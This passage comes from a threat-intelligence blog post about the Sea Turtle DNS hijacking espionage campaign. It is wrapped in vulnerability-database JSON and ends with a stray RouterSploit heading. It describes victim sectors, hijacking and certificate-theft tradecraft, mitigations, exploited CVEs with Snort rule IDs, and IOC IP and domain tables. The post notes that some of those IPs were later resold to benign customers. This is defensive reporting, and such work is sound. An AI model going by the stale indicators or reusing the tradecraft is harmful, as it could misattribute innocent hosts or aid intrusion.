victims\n\n[![](https://4.bp.blogspot.com/-NQC457__bD8/XLX7w7QGGOI/AAAAAAAAAgA/3nx4TTK6U1oHms5gRhGQRaw6TGmTo1H-ACEwYBhgL/s640/image1.jpg)](<https://4.bp.blogspot.com/-NQC457__bD8/XLX7w7QGGOI/AAAAAAAAAgA/3nx4TTK6U1oHms5gRhGQRaw6TGmTo1H-ACEwYBhgL/s1600/image1.jpg>)\n\n \n \nWe identified 40 different organizations that have been targeted during this campaign. The victim organizations appear to be broadly grouped into two different categories. The first group of victims, which we refer to as primary victims, were almost entirely located in the Middle East and North Africa. Some examples of organizations that were compromised include: \n\n\n * Ministries of foreign affairs\n * Military organizations\n * Intelligence agencies\n * Prominent energy organizations\nThe second cluster of victim organizations were likely compromised to help enable access to these primary targets. These organizations were located around the world; however, they were mostly concentrated in the Middle East and North Africa. Some examples of organizations that were compromised include: \n\n\n * Telecommunications organizations\n * Internet service providers\n * Information technology firms\n * Registrars\n * One registry\n \nNotably, the threat actors were able to gain access to registrars that manage ccTLDs for Amnic, which is listed as the technical contact on [IANA](<https://www.iana.org/domains/root/db/am.html>) for the ccTLD .am. Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs. \n\n\n### How is this tradecraft different?\n\nThe threat actors behind the Sea Turtle campaign have proven to be highly capable, as they have been able to perform operations for over two years and have been undeterred by public reports documenting various aspects of their activity. This cyber threat campaign represents the first known case of a domain name registry organization that was compromised for cyber espionage operations. \n \nIn order to distinguish this activity from the previous reporting on other attackers, such as those affiliated with DNSpionage, below is a list of traits that are unique to the threat actors behind the Sea Turtle campaign: \n\n\n * These actors perform DNS hijacking through the use of actor-controlled name servers.\n * These actors have been more aggressive in their pursuit targeting DNS registries and a number of registrars, including those that manage ccTLDs.\n * These actors use Let's Encrypts, Comodo, Sectigo, and self-signed certificates in their MitM servers to gain the initial round of credentials.\n * Once they have access to the network, they steal the organization's legitimate SSL certificate and use it on actor-controlled servers.\n\n### Why was it so successful?\n\nWe believe that the Sea Turtle campaign continues to be highly successful for several reasons. First, the actors employ a unique approach to gain access to the targeted networks. Most traditional security products such as IDS and IPS systems are not designed to monitor and log DNS requests. The threat actors were able to achieve this level of success because the DNS domain space system added security into the equation as an afterthought. Had more ccTLDs implemented security features such as registrar locks, attackers would be unable to redirect the targeted domains. \n \nThe threat actors also used an interesting techniques called certificate impersonation. This technique was successful in part because the SSL certificates were created to provide confidentiality, not integrity. The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials, allowing the actors to gain access to the targeted network. \n \nThe threat actors were able to maintain long term persistent access to many of these networks by utilizing compromised credentials. \n \nWe will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve to ensure that our customers remain protected and the public is informed. \n \n\n\n### Mitigation strategy\n\nIn order to best protect against this type of attack, we compiled a list of potential actions. Talos suggests using a registry lock service, which will require an out-of-band message before any changes can occur to an organization's DNS record. If your registrar does not offer a registry lock service, we recommend implementing multi-factor authentication, such as [DUO](<https://www.cisco.com/c/en/us/products/security/adaptive-multi-factor-authentication.html>), to access your organization's DNS records. If you suspect you were targeted by this type of activity intrusion, we recommend instituting a network-wide password reset, preferably from a computer on a trusted network. Lastly, we recommend applying patches, especially on internet-facing machines. Network administrators can monitor passive DNS record on their domains, to check for abnormalities. \n \n\n\n### Coverage\n\nCVE-2009-1151: PHP code injection vulnerability affecting phpMyAdmin \nSID: [2281](<https://snort.org/rule_docs/1-2281>) \n \nCVE-2014-6271: RCE affecting GNU bash system, specific the SMTP (this was part of the Shellshock CVEs) \nSID: [31975](<https://snort.org/rule_docs/1-31975>) \\- [31978](<https://snort.org/rule_docs/1-31978>), [31985](<https://snort.org/rule_docs/1-31985>), [32038](<https://snort.org/rule_docs/1-32038>), [32039](<https://snort.org/rule_docs/1-32039>), [32041](<https://snort.org/rule_docs/1-32041>) \\- [32043](<https://snort.org/rule_docs/1-32043>), [32069](<https://snort.org/rule_docs/1-32069>), [32335](<https://snort.org/rule_docs/1-32335>), [32336](<https://snort.org/rule_docs/1-32336>) \n \nCVE-2017-3881: RCE for Cisco switches \nSID: [41909](<https://snort.org/rule_docs/1-41909>) \\- [41910](<https://snort.org/rule_docs/1-41910>) \n \nCVE-2017-6736: Remote Code Exploit (RCE) for Cisco integrated Service Router 2811 \nSID: [43424](<https://snort.org/rule_docs/3-43424>) \\- [43432](<https://snort.org/rule_docs/3-43432>) \n \nCVE-2017-12617: RCE affecting Apache web servers running Tomcat \nSID: [44531](<https://snort.org/rule_docs/1-44531>) \n \nCVE-2018-0296: Directory traversal to gain unauthorized access to Cisco Adaptive Security Appliances (ASAs) and Firewalls \nSID: 46897 \n \nCVE-2018-7600: RCE for Website built with Drupal aka \"Drupalgeddon\" \nSID: [46316](<https://snort.org/rule_docs/1-46316>) \n\n\n### Indicators of Compromise\n\nThe threat actors utilized leased IP addresses from organizations that offer virtual private server (VPS) services. These VPS providers have since resold many of these IP addresses to various benign customers. To help network defenders, we have included the IP address, as well as the month(s) that the IP address was associated with the threat actor. \n \n** \n** \n\n\n**IP address**\n\n| \n\n**Month**\n\n| \n\n**Year**\n\n| \n\n**Country of targets** \n \n---|---|---|--- \n \n199.247.3.191\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania, Iraq \n \n37.139.11.155\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania, UAE \n \n185.15.247.140\n\n| \n\nJanuary\n\n| \n\n2018\n\n| \n\nAlbania \n \n206.221.184.133\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nEgypt \n \n188.166.119.57\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nEgypt \n \n185.42.137.89\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania \n \n82.196.8.43\n\n| \n\nOctober\n\n| \n\n2018\n\n| \n\nIraq \n \n159.89.101.204\n\n| \n\nDecember - January\n\n| \n\n2018-2019\n\n| \n\nTurkey, Sweden, Syria, Armenia, US \n \n146.185.145.202\n\n| \n\nMarch\n\n| \n\n2018\n\n| \n\nArmenia \n \n178.62.218.244\n\n| \n\nDecember - January\n\n| \n\n2018-2019\n\n| \n\nUAE, Cyprus \n \n139.162.144.139\n\n| \n\nDecember \n\n| \n\n2018\n\n| \n\nJordan \n \n142.54.179.69\n\n| \n\nJanuary - February \n\n| \n\n2017\n\n| \n\nJordan \n \n193.37.213.61\n\n| \n\nDecember\n\n| \n\n2018\n\n| \n\nCyprus \n \n108.61.123.149\n\n| \n\nFebruary\n\n| \n\n2019\n\n| \n\nCyprus \n \n212.32.235.160\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nIraq \n \n198.211.120.186\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nIraq \n \n146.185.143.158\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nIraq \n \n146.185.133.141\n\n| \n\nOctober\n\n| \n\n2018\n\n| \n\nLibya \n \n185.203.116.116\n\n| \n\nMay\n\n| \n\n2018\n\n| \n\nUAE \n \n95.179.150.92\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nUAE \n \n174.138.0.113\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nUAE \n \n128.199.50.175\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nUAE \n \n139.59.134.216\n\n| \n\nJuly - December\n\n| \n\n2018\n\n| \n\nUnited States, Lebanon \n \n45.77.137.65\n\n| \n\nMarch - April\n\n| \n\n2019\n\n| \n\nSyria, Sweden \n \n142.54.164.189\n\n| \n\nMarch - April\n\n| \n\n2019\n\n| \n\nSyria \n \n199.247.17.221\n\n| \n\nMarch \n\n| \n\n2019\n\n| \n\nSweden \n \n** \n** \n\n\nThe following list contains the threat actor name server domains and their IP address.\n\n \n\n\nDomain\n\n| \n\nActive Timeframe\n\n| \n\nIP address \n \n---|---|--- \n \nns1[.]intersecdns[.]com\n\n| \n\nMarch - April 2019\n\n| \n\n95.179.150.101 \n \nns2[.]intersecdns[.]com\n\n| \n\nMarch - April 2019\n\n| \n\n95.179.150.101 \n \nns1[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n\n| \n\n95.179.150.101 \n \nns2[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n\n| \n\n95.179.150.101 \n \n![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/GSxJP9GzlhI)", "cvss3": {}, "published": "2019-04-18T16:08:25", "type": "talosblog", "title": "DNS Hijacking Abuses Trust In Core Internet Service", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2009-1151", "CVE-2014-6271", "CVE-2017-12617", "CVE-2017-3881", "CVE-2017-6736", "CVE-2018-0296", "CVE-2018-7600"], "modified": "2019-04-18T16:08:25", "id": "TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/GSxJP9GzlhI/seaturtle.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}

UPDATED VERSION: RouterSploit 3.4.0

Description

Related